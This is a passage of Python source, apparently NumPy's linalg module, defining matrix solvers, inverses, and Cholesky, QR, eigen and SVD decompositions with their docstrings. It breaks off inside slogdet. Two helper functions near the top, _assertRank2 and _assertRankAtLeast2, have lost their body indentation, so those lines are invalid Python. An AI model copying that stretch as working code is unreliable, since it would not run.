    return out[0] if len(out) == 1 else out
def _assertRank2(*arrays):
for a in arrays:
if a.ndim != 2:
raise LinAlgError('%d-dimensional array given. Array must be '
'two-dimensional' % a.ndim)
def _assertRankAtLeast2(*arrays):
for a in arrays:
if a.ndim < 2:
raise LinAlgError('%d-dimensional array given. Array must be '
'at least two-dimensional' % a.ndim)
def _assertSquareness(*arrays):
    # Every input must be square (all dimensions equal).
    for a in arrays:
        if max(a.shape) != min(a.shape):
            raise LinAlgError('Array must be square')
def _assertNdSquareness(*arrays):
    # The last two dimensions of every input must be equal (stacked matrices).
    for a in arrays:
        if max(a.shape[-2:]) != min(a.shape[-2:]):
            raise LinAlgError('Last 2 dimensions of the array must be square')
def _assertFinite(*arrays):
    # Reject arrays containing NaN or infinity.
    for a in arrays:
        if not (isfinite(a).all()):
            raise LinAlgError("Array must not contain infs or NaNs")
def _isEmpty2d(arr):
    # True when the trailing 2-D matrix part of `arr` has zero elements.
    # check size first for efficiency
    return arr.size == 0 and product(arr.shape[-2:]) == 0
def _assertNoEmpty2d(*arrays):
    # Reject arrays whose matrix part is empty.
    for a in arrays:
        if _isEmpty2d(a):
            raise LinAlgError("Arrays cannot be empty")
# Linear equations
def tensorsolve(a, b, axes=None):
    """
    Solve the tensor equation ``a x = b`` for x.

    All indices of `x` are summed over in the product, together with the
    rightmost indices of `a`, as in ``tensordot(a, x, axes=b.ndim)``.

    Parameters
    ----------
    a : array_like
        Coefficient tensor of shape ``b.shape + Q``, where ``Q`` satisfies
        ``prod(Q) == prod(b.shape)`` (`a` is 'square' in that sense).
    b : array_like
        Right-hand tensor, which can be of any shape.
    axes : tuple of ints, optional
        Axes in `a` to reorder to the right, before inversion.
        If None (default), no reordering is done.

    Returns
    -------
    x : ndarray, shape Q

    Raises
    ------
    LinAlgError
        If `a` is singular or not 'square' (in the above sense).

    See Also
    --------
    numpy.tensordot, tensorinv, numpy.einsum
    """
    a, wrap = _makearray(a)
    b = asarray(b)
    an = a.ndim

    if axes is not None:
        # Move the axes listed in `axes` to the end, preserving their order.
        allaxes = [k for k in range(an) if k not in axes] + list(axes)
        a = a.transpose(allaxes)

    # The trailing dims of `a` (beyond b's rank) form the solution shape Q.
    oldshape = a.shape[-(an - b.ndim):]
    prod = 1
    for dim in oldshape:
        prod *= dim

    # Flatten to an ordinary 2-D linear system and solve.
    a = a.reshape(-1, prod)
    b = b.ravel()
    res = wrap(solve(a, b))
    res.shape = oldshape
    return res
def solve(a, b):
    """
    Solve a linear matrix equation, or system of linear scalar equations.

    Computes the "exact" solution, `x`, of the well-determined, i.e., full
    rank, linear matrix equation ``a x = b``.

    Parameters
    ----------
    a : (..., M, M) array_like
        Coefficient matrix.
    b : {(..., M,), (..., M, K)}, array_like
        Ordinate or "dependent variable" values.

    Returns
    -------
    x : {(..., M,), (..., M, K)} ndarray
        Solution to the system a x = b.  Returned shape is identical to `b`.

    Raises
    ------
    LinAlgError
        If `a` is singular or not square.

    Notes
    -----
    Broadcasting rules apply; the solutions are computed using the LAPACK
    routine ``_gesv``.  `a` must be square and of full rank; otherwise use
    `lstsq` for a least-squares "solution".
    """
    a, _ = _makearray(a)
    _assertRankAtLeast2(a)
    _assertNdSquareness(a)
    b, wrap = _makearray(b)
    t, result_t = _commonType(a, b)

    # `b` is treated as a stack of vectors only when its number of extra
    # dimensions matches `a`'s exactly; otherwise it is a stack of matrices.
    gufunc = (_umath_linalg.solve1 if b.ndim == a.ndim - 1
              else _umath_linalg.solve)

    signature = 'DD->D' if isComplexType(t) else 'dd->d'
    extobj = get_linalg_error_extobj(_raise_linalgerror_singular)
    result = gufunc(a, b, signature=signature, extobj=extobj)
    return wrap(result.astype(result_t, copy=False))
def tensorinv(a, ind=2):
    """
    Compute the 'inverse' of an N-dimensional array.

    The result is an inverse for `a` relative to the tensordot operation
    ``tensordot(a, b, ind)``: up to floating-point accuracy,
    ``tensordot(tensorinv(a), a, ind)`` is the "identity" tensor.

    Parameters
    ----------
    a : array_like
        Tensor to 'invert'.  Its shape must be 'square', i.e.,
        ``prod(a.shape[:ind]) == prod(a.shape[ind:])``.
    ind : int, optional
        Number of first indices that are involved in the inverse sum.
        Must be a positive integer, default is 2.

    Returns
    -------
    b : ndarray
        `a`'s tensordot inverse, shape ``a.shape[ind:] + a.shape[:ind]``.

    Raises
    ------
    LinAlgError
        If `a` is singular or not 'square' (in the above sense).

    See Also
    --------
    numpy.tensordot, tensorsolve
    """
    a = asarray(a)
    oldshape = a.shape
    if ind <= 0:
        raise ValueError("Invalid ind argument.")
    # The inverse swaps the two index groups.
    invshape = oldshape[ind:] + oldshape[:ind]
    prod = 1
    for dim in oldshape[ind:]:
        prod *= dim
    # Flatten to a square matrix, invert, and restore the swapped shape.
    ia = inv(a.reshape(prod, -1))
    return ia.reshape(*invshape)
# Matrix inversion
def inv(a):
    """
    Compute the (multiplicative) inverse of a matrix.

    Given a square matrix `a`, return the matrix `ainv` satisfying
    ``dot(a, ainv) = dot(ainv, a) = eye(a.shape[0])``.

    Parameters
    ----------
    a : (..., M, M) array_like
        Matrix to be inverted.

    Returns
    -------
    ainv : (..., M, M) ndarray or matrix
        (Multiplicative) inverse of the matrix `a`.

    Raises
    ------
    LinAlgError
        If `a` is not square or inversion fails.

    Notes
    -----
    Broadcasting rules apply, see the `numpy.linalg` documentation for
    details.  Stacks of matrices are inverted independently.
    """
    a, wrap = _makearray(a)
    _assertRankAtLeast2(a)
    _assertNdSquareness(a)
    t, result_t = _commonType(a)

    signature = 'D->D' if isComplexType(t) else 'd->d'
    extobj = get_linalg_error_extobj(_raise_linalgerror_singular)
    ainv = _umath_linalg.inv(a, signature=signature, extobj=extobj)
    return wrap(ainv.astype(result_t, copy=False))
# Cholesky decomposition
def cholesky(a):
    """
    Cholesky decomposition.

    Return the Cholesky decomposition, ``L * L.H``, of the square matrix
    `a`, where `L` is lower-triangular and ``.H`` is the conjugate transpose
    operator (the ordinary transpose if `a` is real-valued).  `a` must be
    Hermitian (symmetric if real-valued) and positive-definite.  Only `L` is
    actually returned.

    Parameters
    ----------
    a : (..., M, M) array_like
        Hermitian (symmetric if all elements are real), positive-definite
        input matrix.

    Returns
    -------
    L : (..., M, M) array_like
        Lower-triangular Cholesky factor of `a`.  Returns a matrix object
        if `a` is a matrix object.

    Raises
    ------
    LinAlgError
        If the decomposition fails, for example, if `a` is not
        positive-definite.

    Notes
    -----
    Broadcasting rules apply, see the `numpy.linalg` documentation for
    details.  The decomposition is often used as a fast way of solving
    ``A x = b`` for Hermitian positive-definite ``A``.
    """
    a, wrap = _makearray(a)
    _assertRankAtLeast2(a)
    _assertNdSquareness(a)
    t, result_t = _commonType(a)

    signature = 'D->D' if isComplexType(t) else 'd->d'
    # Non-positive-definite inputs surface as a LinAlgError via this callback.
    extobj = get_linalg_error_extobj(_raise_linalgerror_nonposdef)
    r = _umath_linalg.cholesky_lo(a, signature=signature, extobj=extobj)
    return wrap(r.astype(result_t, copy=False))
# QR decompostion
def qr(a, mode='reduced'):
    """
    Compute the qr factorization of a matrix.
    Factor the matrix `a` as *qr*, where `q` is orthonormal and `r` is
    upper-triangular.
    Parameters
    ----------
    a : array_like, shape (M, N)
        Matrix to be factored.
    mode : {'reduced', 'complete', 'r', 'raw', 'full', 'economic'}, optional
        If K = min(M, N), then
        'reduced'  : returns q, r with dimensions (M, K), (K, N) (default)
        'complete' : returns q, r with dimensions (M, M), (M, N)
        'r'        : returns r only with dimensions (K, N)
        'raw'      : returns h, tau with dimensions (N, M), (K,)
        'full'     : alias of 'reduced', deprecated
        'economic' : returns h from 'raw', deprecated.
        The options 'reduced', 'complete', and 'raw' are new in numpy 1.8,
        see the notes for more information. The default is 'reduced' and to
        maintain backward compatibility with earlier versions of numpy both
        it and the old default 'full' can be omitted. Note that array h
        returned in 'raw' mode is transposed for calling Fortran. The
        'economic' mode is deprecated.  The modes 'full' and 'economic' may
        be passed using only the first letter for backwards compatibility,
        but all others must be spelled out. See the Notes for more
        explanation.
    Returns
    -------
    q : ndarray of float or complex, optional
        A matrix with orthonormal columns. When mode = 'complete' the
        result is an orthogonal/unitary matrix depending on whether or not
        a is real/complex. The determinant may be either +/- 1 in that
        case.
    r : ndarray of float or complex, optional
        The upper-triangular matrix.
    (h, tau) : ndarrays of np.double or np.cdouble, optional
        The array h contains the Householder reflectors that generate q
        along with r. The tau array contains scaling factors for the
        reflectors. In the deprecated  'economic' mode only h is returned.
    Raises
    ------
    LinAlgError
        If factoring fails.
    Notes
    -----
    This is an interface to the LAPACK routines dgeqrf, zgeqrf,
    dorgqr, and zungqr.
    For more information on the qr factorization, see for example:
    http://en.wikipedia.org/wiki/QR_factorization
    Subclasses of `ndarray` are preserved except for the 'raw' mode. So if
    `a` is of type `matrix`, all the return values will be matrices too.
    New 'reduced', 'complete', and 'raw' options for mode were added in
    NumPy 1.8.0 and the old option 'full' was made an alias of 'reduced'.  In
    addition the options 'full' and 'economic' were deprecated.  Because
    'full' was the previous default and 'reduced' is the new default,
    backward compatibility can be maintained by letting `mode` default.
    The 'raw' option was added so that LAPACK routines that can multiply
    arrays by q using the Householder reflectors can be used. Note that in
    this case the returned arrays are of type np.double or np.cdouble and
    the h array is transposed to be FORTRAN compatible.  No routines using
    the 'raw' return are currently exposed by numpy, but some are available
    in lapack_lite and just await the necessary work.
    """
    # Normalize deprecated single-letter / legacy mode spellings first.
    if mode not in ('reduced', 'complete', 'r', 'raw'):
        if mode in ('f', 'full'):
            # 2013-04-01, 1.8
            msg = "".join((
                "The 'full' option is deprecated in favor of 'reduced'.\n",
                "For backward compatibility let mode default."))
            warnings.warn(msg, DeprecationWarning, stacklevel=2)
            mode = 'reduced'
        elif mode in ('e', 'economic'):
            # 2013-04-01, 1.8
            msg = "The 'economic' option is deprecated."
            warnings.warn(msg, DeprecationWarning, stacklevel=2)
            mode = 'economic'
        else:
            raise ValueError("Unrecognized mode '%s'" % mode)
    a, wrap = _makearray(a)
    _assertRank2(a)
    _assertNoEmpty2d(a)
    m, n = a.shape
    t, result_t = _commonType(a)
    # LAPACK is Fortran (column-major): work on a copied transpose.
    a = _fastCopyAndTranspose(t, a)
    a = _to_native_byte_order(a)
    mn = min(m, n)
    tau = zeros((mn,), t)
    if isComplexType(t):
        lapack_routine = lapack_lite.zgeqrf
        routine_name = 'zgeqrf'
    else:
        lapack_routine = lapack_lite.dgeqrf
        routine_name = 'dgeqrf'
    # calculate optimal size of work data 'work'
    # (LAPACK workspace query: lwork=-1 writes the optimal size to work[0])
    lwork = 1
    work = zeros((lwork,), t)
    results = lapack_routine(m, n, a, m, tau, work, -1, 0)
    if results['info'] != 0:
        raise LinAlgError('%s returns %d' % (routine_name, results['info']))
    # do qr decomposition
    lwork = int(abs(work[0]))
    work = zeros((lwork,), t)
    results = lapack_routine(m, n, a, m, tau, work, lwork, 0)
    if results['info'] != 0:
        raise LinAlgError('%s returns %d' % (routine_name, results['info']))
    # handle modes that don't return q
    if mode == 'r':
        r = _fastCopyAndTranspose(result_t, a[:, :mn])
        return wrap(triu(r))
    if mode == 'raw':
        # Householder reflectors + scaling factors, Fortran-ordered.
        return a, tau
    if mode == 'economic':
        if t != result_t :
            a = a.astype(result_t, copy=False)
        return wrap(a.T)
    # generate q from a
    if mode == 'complete' and m > n:
        mc = m
        q = empty((m, m), t)
    else:
        mc = mn
        q = empty((n, m), t)
    q[:n] = a
    if isComplexType(t):
        lapack_routine = lapack_lite.zungqr
        routine_name = 'zungqr'
    else:
        lapack_routine = lapack_lite.dorgqr
        routine_name = 'dorgqr'
    # determine optimal lwork
    # (second workspace query, this time for the q-generation routine)
    lwork = 1
    work = zeros((lwork,), t)
    results = lapack_routine(m, mc, mn, q, m, tau, work, -1, 0)
    if results['info'] != 0:
        raise LinAlgError('%s returns %d' % (routine_name, results['info']))
    # compute q
    lwork = int(abs(work[0]))
    work = zeros((lwork,), t)
    results = lapack_routine(m, mc, mn, q, m, tau, work, lwork, 0)
    if results['info'] != 0:
        raise LinAlgError('%s returns %d' % (routine_name, results['info']))
    q = _fastCopyAndTranspose(result_t, q[:mc])
    r = _fastCopyAndTranspose(result_t, a[:, :mc])
    return wrap(q), wrap(triu(r))
# Eigenvalues
def eigvals(a):
    """
    Compute the eigenvalues of a general square matrix.

    This is the eigenvalue-only counterpart of `eig`; the eigenvectors
    are not computed.

    Parameters
    ----------
    a : (..., M, M) array_like
        Real- or complex-valued square matrices.

    Returns
    -------
    w : (..., M,) ndarray
        The eigenvalues, each repeated according to its multiplicity.
        They are not ordered.  For real input the result is real when
        every eigenvalue has a zero imaginary part, complex otherwise.

    Raises
    ------
    LinAlgError
        If the eigenvalue computation does not converge.

    See Also
    --------
    eig : eigenvalues and right eigenvectors of general arrays
    eigvalsh : eigenvalues of symmetric or Hermitian arrays.
    eigh : eigenvalues and eigenvectors of symmetric/Hermitian arrays.

    Notes
    -----
    Broadcasting rules apply, see the `numpy.linalg` documentation for
    details.  The work is delegated to the LAPACK ``_geev`` family of
    routines, which operate on the last two dimensions.
    """
    a, wrap = _makearray(a)
    _assertRankAtLeast2(a)
    _assertNdSquareness(a)
    _assertFinite(a)
    t, result_t = _commonType(a)
    extobj = get_linalg_error_extobj(
        _raise_linalgerror_eigenvalues_nonconvergence)
    signature = 'D->D' if isComplexType(t) else 'd->D'
    w = _umath_linalg.eigvals(a, signature=signature, extobj=extobj)
    if not isComplexType(t):
        # Real input: drop the (all-zero) imaginary parts when possible so
        # callers get a real array back for genuinely real spectra.
        if all(w.imag == 0):
            w, result_t = w.real, _realType(result_t)
        else:
            result_t = _complexType(result_t)
    return w.astype(result_t, copy=False)
def eigvalsh(a, UPLO='L'):
    """
    Compute the eigenvalues of a complex Hermitian or real symmetric matrix.

    Counterpart of `eigh` that skips computing the eigenvectors.

    Parameters
    ----------
    a : (..., M, M) array_like
        Hermitian or real symmetric matrices whose eigenvalues are to
        be computed.
    UPLO : {'L', 'U'}, optional
        Whether the calculation uses the lower triangular part of `a`
        ('L', default) or the upper triangular part ('U').  Either way
        only the real parts of the diagonal are considered, preserving
        the notion of a Hermitian matrix; the imaginary part of the
        diagonal is always treated as zero.

    Returns
    -------
    w : (..., M,) ndarray
        The eigenvalues in ascending order, each repeated according to
        its multiplicity.  Always real-valued.

    Raises
    ------
    LinAlgError
        If the eigenvalue computation does not converge.

    See Also
    --------
    eigh : eigenvalues and eigenvectors of symmetric/Hermitian arrays.
    eigvals : eigenvalues of general real or complex arrays.
    eig : eigenvalues and right eigenvectors of general arrays.

    Notes
    -----
    Broadcasting rules apply, see the `numpy.linalg` documentation for
    details.  The eigenvalues are computed using the LAPACK routines
    ``_syevd`` and ``_heevd``.
    """
    uplo = UPLO.upper()
    if uplo not in ('L', 'U'):
        raise ValueError("UPLO argument must be 'L' or 'U'")
    # Select the gufunc matching the referenced triangle.
    gufunc = {'L': _umath_linalg.eigvalsh_lo,
              'U': _umath_linalg.eigvalsh_up}[uplo]
    extobj = get_linalg_error_extobj(
        _raise_linalgerror_eigenvalues_nonconvergence)
    a, _ = _makearray(a)
    _assertRankAtLeast2(a)
    _assertNdSquareness(a)
    t, result_t = _commonType(a)
    signature = 'D->d' if isComplexType(t) else 'd->d'
    w = gufunc(a, signature=signature, extobj=extobj)
    return w.astype(_realType(result_t), copy=False)
def _convertarray(a):
    # Cast `a` to the common computation type and return it transposed in
    # a Fortran-contiguous copy, along with the computation and result types.
    t, result_t = _commonType(a)
    return _fastCT(a.astype(t)), t, result_t
# Eigenvectors
def eig(a):
    """
    Compute the eigenvalues and right eigenvectors of a square array.

    Parameters
    ----------
    a : (..., M, M) array
        Matrices for which the eigenvalues and right eigenvectors will
        be computed.

    Returns
    -------
    w : (..., M) array
        The eigenvalues, each repeated according to its multiplicity,
        in no particular order.  The result is complex unless every
        imaginary part is zero, in which case it is cast to a real
        type.  For real `a` the eigenvalues are real or occur in
        conjugate pairs.
    v : (..., M, M) array
        The normalized (unit "length") eigenvectors: column ``v[:,i]``
        corresponds to eigenvalue ``w[i]``.

    Raises
    ------
    LinAlgError
        If the eigenvalue computation does not converge.

    See Also
    --------
    eigvals : eigenvalues of a non-symmetric array.
    eigh : eigenvalues and eigenvectors of a symmetric or Hermitian array.
    eigvalsh : eigenvalues of a symmetric or Hermitian array.

    Notes
    -----
    Broadcasting rules apply, see the `numpy.linalg` documentation for
    details.  This is implemented using the LAPACK ``_geev`` routines.

    `w` and `v` satisfy ``dot(a[:,:], v[:,i]) = w[i] * v[:,i]``.  The
    eigenvectors are the *right* eigenvectors; they may not be of
    maximum rank, and `v` is unitary only when `a` is normal.

    References
    ----------
    G. Strang, *Linear Algebra and Its Applications*, 2nd Ed., Orlando, FL,
    Academic Press, Inc., 1980, Various pp.
    """
    a, wrap = _makearray(a)
    _assertRankAtLeast2(a)
    _assertNdSquareness(a)
    _assertFinite(a)
    t, result_t = _commonType(a)
    extobj = get_linalg_error_extobj(
        _raise_linalgerror_eigenvalues_nonconvergence)
    signature = 'D->DD' if isComplexType(t) else 'd->DD'
    w, vt = _umath_linalg.eig(a, signature=signature, extobj=extobj)
    # For real input whose spectrum is entirely real, return real arrays;
    # otherwise promote the result type to complex.
    real_result = not isComplexType(t) and all(w.imag == 0.0)
    if real_result:
        w, vt = w.real, vt.real
        result_t = _realType(result_t)
    else:
        result_t = _complexType(result_t)
    vt = vt.astype(result_t, copy=False)
    return w.astype(result_t, copy=False), wrap(vt)
def eigh(a, UPLO='L'):
    """
    Return the eigenvalues and eigenvectors of a Hermitian or symmetric
    matrix.

    Returns a 1-D array containing the eigenvalues of `a` and a 2-D
    square array or matrix (depending on the input type) of the
    corresponding eigenvectors (in columns).

    Parameters
    ----------
    a : (..., M, M) array
        Hermitian/symmetric matrices whose eigenvalues and eigenvectors
        are to be computed.
    UPLO : {'L', 'U'}, optional
        Whether the calculation uses the lower triangular part of `a`
        ('L', default) or the upper triangular part ('U').  Either way
        only the real parts of the diagonal are considered, so the
        imaginary part of the diagonal is always treated as zero.

    Returns
    -------
    w : (..., M) ndarray
        The eigenvalues in ascending order, each repeated according to
        its multiplicity.
    v : {(..., M, M) ndarray, (..., M, M) matrix}
        Column ``v[:, i]`` is the normalized eigenvector corresponding
        to eigenvalue ``w[i]``.  A matrix object is returned when `a`
        is a matrix object.

    Raises
    ------
    LinAlgError
        If the eigenvalue computation does not converge.

    See Also
    --------
    eigvalsh : eigenvalues of symmetric or Hermitian arrays.
    eig : eigenvalues and right eigenvectors for non-symmetric arrays.
    eigvals : eigenvalues of non-symmetric arrays.

    Notes
    -----
    Broadcasting rules apply, see the `numpy.linalg` documentation for
    details.  The eigenvalues/eigenvectors are computed using the LAPACK
    routines ``_syevd`` and ``_heevd``.  The eigenvalues of real
    symmetric or complex Hermitian matrices are always real [1]_, and
    ``dot(a, v[:, i]) = w[i] * v[:, i]`` holds with unitary `v`.

    References
    ----------
    .. [1] G. Strang, *Linear Algebra and Its Applications*, 2nd Ed., Orlando,
           FL, Academic Press, Inc., 1980, pg. 222.
    """
    uplo = UPLO.upper()
    if uplo not in ('L', 'U'):
        raise ValueError("UPLO argument must be 'L' or 'U'")
    a, wrap = _makearray(a)
    _assertRankAtLeast2(a)
    _assertNdSquareness(a)
    t, result_t = _commonType(a)
    extobj = get_linalg_error_extobj(
        _raise_linalgerror_eigenvalues_nonconvergence)
    # Dispatch on which triangle of `a` is referenced.
    gufunc = _umath_linalg.eigh_lo if uplo == 'L' else _umath_linalg.eigh_up
    signature = 'D->dD' if isComplexType(t) else 'd->dd'
    w, vt = gufunc(a, signature=signature, extobj=extobj)
    return (w.astype(_realType(result_t), copy=False),
            wrap(vt.astype(result_t, copy=False)))
# Singular value decomposition
def svd(a, full_matrices=True, compute_uv=True):
    """
    Singular Value Decomposition.

    Factors the matrix `a` as ``u * np.diag(s) * v``, where `u` and `v`
    are unitary and `s` is a 1-d array of `a`'s singular values.

    Parameters
    ----------
    a : (..., M, N) array_like
        A real or complex matrix of shape (`M`, `N`).
    full_matrices : bool, optional
        If True (default), `u` and `v` have the shapes (`M`, `M`) and
        (`N`, `N`), respectively.  Otherwise, the shapes are (`M`, `K`)
        and (`K`, `N`), respectively, where `K` = min(`M`, `N`).
    compute_uv : bool, optional
        Whether or not to compute `u` and `v` in addition to `s`.  True
        by default.

    Returns
    -------
    u : { (..., M, M), (..., M, K) } array
        Unitary matrices.  The actual shape depends on the value of
        ``full_matrices``.  Only returned when ``compute_uv`` is True.
    s : (..., K) array
        The singular values for every matrix, sorted in descending order.
    v : { (..., N, N), (..., K, N) } array
        Unitary matrices.  The actual shape depends on the value of
        ``full_matrices``.  Only returned when ``compute_uv`` is True.

    Raises
    ------
    LinAlgError
        If SVD computation does not converge.

    Notes
    -----
    Broadcasting rules apply, see the `numpy.linalg` documentation for
    details.  The decomposition is performed using LAPACK routine
    ``_gesdd``.

    The SVD is commonly written as ``a = U S V.H``.  The `v` returned
    by this function is ``V.H`` and ``u = U``.  The rows of `v` are the
    eigenvectors of ``a.H a``; the columns of `u` are the eigenvectors
    of ``a a.H``.  For row ``i`` in `v` and column ``i`` in `u`, the
    corresponding eigenvalue is ``s[i]**2``.

    If `a` is a `matrix` object (as opposed to an `ndarray`), then so
    are all the return values.

    Examples
    --------
    >>> a = np.random.randn(9, 6) + 1j*np.random.randn(9, 6)
    >>> U, s, V = np.linalg.svd(a, full_matrices=True)
    >>> U.shape, V.shape, s.shape
    ((9, 9), (6, 6), (6,))
    """
    a, wrap = _makearray(a)
    _assertNoEmpty2d(a)
    _assertRankAtLeast2(a)
    t, result_t = _commonType(a)
    extobj = get_linalg_error_extobj(_raise_linalgerror_svd_nonconvergence)
    m, n = a.shape[-2:]
    if compute_uv:
        # The gufunc name encodes which dimension is smaller ('m' vs 'n')
        # and whether full ('f') or reduced ('s') matrices are requested.
        if full_matrices:
            gufunc = _umath_linalg.svd_m_f if m < n else _umath_linalg.svd_n_f
        else:
            gufunc = _umath_linalg.svd_m_s if m < n else _umath_linalg.svd_n_s
        signature = 'D->DdD' if isComplexType(t) else 'd->ddd'
        u, s, vt = gufunc(a, signature=signature, extobj=extobj)
        u = u.astype(result_t, copy=False)
        s = s.astype(_realType(result_t), copy=False)
        vt = vt.astype(result_t, copy=False)
        return wrap(u), s, wrap(vt)
    else:
        # Singular values only.
        gufunc = _umath_linalg.svd_m if m < n else _umath_linalg.svd_n
        signature = 'D->d' if isComplexType(t) else 'd->d'
        s = gufunc(a, signature=signature, extobj=extobj)
        return s.astype(_realType(result_t), copy=False)
def cond(x, p=None):
    """
    Compute the condition number of a matrix.

    The condition number can be computed with respect to any of seven
    different norms, selected by the `p` parameter.

    Parameters
    ----------
    x : (..., M, N) array_like
        The matrix whose condition number is sought.
    p : {None, 1, -1, 2, -2, inf, -inf, 'fro'}, optional
        Order of the norm:

        =====  ============================
        p      norm for matrices
        =====  ============================
        None   2-norm, computed directly using the ``SVD``
        'fro'  Frobenius norm
        inf    max(sum(abs(x), axis=1))
        -inf   min(sum(abs(x), axis=1))
        1      max(sum(abs(x), axis=0))
        -1     min(sum(abs(x), axis=0))
        2      2-norm (largest sing. value)
        -2     smallest singular value
        =====  ============================

        inf means the numpy.inf object, and the Frobenius norm is the
        root-of-sum-of-squares norm.

    Returns
    -------
    c : {float, inf}
        The condition number of the matrix.  May be infinite.

    See Also
    --------
    numpy.linalg.norm

    Notes
    -----
    The condition number of `x` is defined as the norm of `x` times the
    norm of the inverse of `x` [1]_.

    References
    ----------
    .. [1] G. Strang, *Linear Algebra and Its Applications*, Orlando, FL,
           Academic Press, Inc., 1980, pg. 285.

    Examples
    --------
    >>> from numpy import linalg as LA
    >>> a = np.array([[1, 0, -1], [0, 1, 0], [1, 0, 1]])
    >>> LA.cond(a)
    1.4142135623730951
    >>> LA.cond(a, 'fro')
    3.1622776601683795
    """
    x = asarray(x)  # in case we have a matrix
    if p is None:
        # Default 2-norm condition number: ratio of the extreme singular
        # values (they come back sorted in descending order).
        sv = svd(x, compute_uv=False)
        return sv[..., 0] / sv[..., -1]
    # Otherwise fall back on the definition ||x|| * ||x^-1||.
    return norm(x, p, axis=(-2, -1)) * norm(inv(x), p, axis=(-2, -1))
def matrix_rank(M, tol=None):
    """
    Return matrix rank of array using SVD method.

    Rank of the array is the number of SVD singular values of the array
    that are greater than `tol`.

    Parameters
    ----------
    M : {(M,), (..., M, N)} array_like
        Input vector or stack of matrices.
    tol : {None, float}, optional
        Threshold below which SVD values are considered zero.  If `tol`
        is None, and ``S`` is an array with singular values for `M`, and
        ``eps`` is the epsilon value for datatype of ``S``, then `tol`
        is set to ``S.max() * max(M.shape) * eps``.

    Notes
    -----
    The default threshold identifies singular values smaller than
    ``S.max() * max(M.shape) * eps`` as indicating rank deficiency (the
    algorithm MATLAB uses [1], also discussed in *Numerical Recipes*
    [2]).  It is designed to account for numerical error in the SVD
    computation itself; if your data carry uncertainties larger than
    floating point epsilon, a tolerance near that uncertainty (possibly
    absolute rather than relative) may be preferable.

    References
    ----------
    .. [1] MATLAB reference documention, "Rank"
           http://www.mathworks.com/help/techdoc/ref/rank.html
    .. [2] W. H. Press, S. A. Teukolsky, W. T. Vetterling and B. P. Flannery,
           "Numerical Recipes (3rd edition)", Cambridge University Press,
           2007, page 795.

    Examples
    --------
    >>> from numpy.linalg import matrix_rank
    >>> matrix_rank(np.eye(4)) # Full rank matrix
    4
    >>> I=np.eye(4); I[-1,-1] = 0. # rank deficient matrix
    >>> matrix_rank(I)
    3
    >>> matrix_rank(np.ones((4,))) # 1 dimension - rank 1 unless all 0
    1
    >>> matrix_rank(np.zeros((4,)))
    0
    """
    M = asarray(M)
    if M.ndim < 2:
        # A vector has rank 1 unless it is identically zero.
        return int(not all(M == 0))
    S = svd(M, compute_uv=False)
    if tol is None:
        # Relative default threshold; keepdims so it broadcasts over a
        # stack of matrices.
        eps = finfo(S.dtype).eps
        tol = S.max(axis=-1, keepdims=True) * max(M.shape[-2:]) * eps
    return (S > tol).sum(axis=-1)
# Generalized inverse
def pinv(a, rcond=1e-15):
    """
    Compute the (Moore-Penrose) pseudo-inverse of a matrix.

    Calculate the generalized inverse of a matrix using its
    singular-value decomposition (SVD) and including all
    *large* singular values.

    Parameters
    ----------
    a : (M, N) array_like
        Matrix to be pseudo-inverted.
    rcond : float
        Cutoff for small singular values.
        Singular values smaller (in modulus) than
        `rcond` * largest_singular_value (again, in modulus)
        are set to zero.

    Returns
    -------
    B : (N, M) ndarray
        The pseudo-inverse of `a`.  If `a` is a `matrix` instance, then
        so is `B`.

    Raises
    ------
    LinAlgError
        If the SVD computation does not converge.

    Notes
    -----
    The pseudo-inverse of a matrix A, denoted :math:`A^+`, is
    defined as: "the matrix that 'solves' [the least-squares problem]
    :math:`Ax = b`," i.e., if :math:`\\bar{x}` is said solution, then
    :math:`A^+` is that matrix such that :math:`\\bar{x} = A^+b`.

    It can be shown that if :math:`Q_1 \\Sigma Q_2^T = A` is the singular
    value decomposition of A, then
    :math:`A^+ = Q_2 \\Sigma^+ Q_1^T`, where :math:`Q_{1,2}` are
    orthogonal matrices, :math:`\\Sigma` is a diagonal matrix consisting
    of A's so-called singular values, (followed, typically, by
    zeros), and then :math:`\\Sigma^+` is simply the diagonal matrix
    consisting of the reciprocals of A's singular values
    (again, followed by zeros). [1]_

    References
    ----------
    .. [1] G. Strang, *Linear Algebra and Its Applications*, 2nd Ed., Orlando,
           FL, Academic Press, Inc., 1980, pp. 139-142.

    Examples
    --------
    The following example checks that ``a * a+ * a == a`` and
    ``a+ * a * a+ == a+``:

    >>> a = np.random.randn(9, 6)
    >>> B = np.linalg.pinv(a)
    >>> np.allclose(a, np.dot(a, np.dot(B, a)))
    True
    >>> np.allclose(B, np.dot(B, np.dot(a, B)))
    True
    """
    a, wrap = _makearray(a)
    if _isEmpty2d(a):
        # Empty input: the pseudo-inverse of an (M, 0)/(0, N) matrix is
        # its (empty) transpose shape.
        res = empty(a.shape[:-2] + (a.shape[-1], a.shape[-2]), dtype=a.dtype)
        return wrap(res)
    a = a.conjugate()
    u, s, vt = svd(a, 0)
    cutoff = rcond*maximum.reduce(s)
    # Invert the singular values above the cutoff and zero out the rest.
    # This vectorized masking replaces the former Python-level loop over
    # min(m, n) entries, with identical results.
    large = s > cutoff
    s[large] = 1./s[large]
    s[~large] = 0.
    res = dot(transpose(vt), multiply(s[:, newaxis], transpose(u)))
    return wrap(res)
# Determinant
def slogdet(a):
    """
    Compute the sign and (natural) logarithm of the determinant of an array.

    If an array has a very small or very large determinant, then a call
    to `det` may overflow or underflow.  This routine is more robust
    against such issues, because it computes the logarithm of the
    determinant rather than the determinant itself.

    Parameters
    ----------
    a : (..., M, M) array_like
        Input array, has to be a square 2-D array.

    Returns
    -------
    sign : (...) array_like
        A number representing the sign of the determinant.  For a real
        matrix this is 1, 0, or -1; for a complex matrix it is a complex
        number of absolute value 1, or else 0.
    logdet : (...) array_like
        The natural log of the absolute value of the determinant.

    If the determinant is zero, then `sign` will be 0 and `logdet` will
    be -Inf.  In all cases the determinant equals
    ``sign * np.exp(logdet)``.

    See Also
    --------
    det

    Notes
    -----
    Broadcasting rules apply, see the `numpy.linalg` documentation for
    details.  The determinant is computed via LU factorization using the
    LAPACK routine ``z/dgetrf``.

    Examples
    --------
    >>> a = np.array([[1, 2], [3, 4]])
    >>> (sign, logdet) = np.linalg.slogdet(a)
    >>> (sign, logdet)
    (-1, 0.69314718055994529)
    >>> sign * np.exp(logdet)
    -2.0

    This routine succeeds where ordinary `det` does not:

    >>> np.linalg.det(np.eye(500) * 0.1)
    0.0
    >>> np.linalg.slogdet(np.eye(500) * 0.1)
    (1, -1151.2925464970228)
    """
    a = asarray(a)
    _assertRankAtLeast2(a)
    _assertNdSquareness(a)
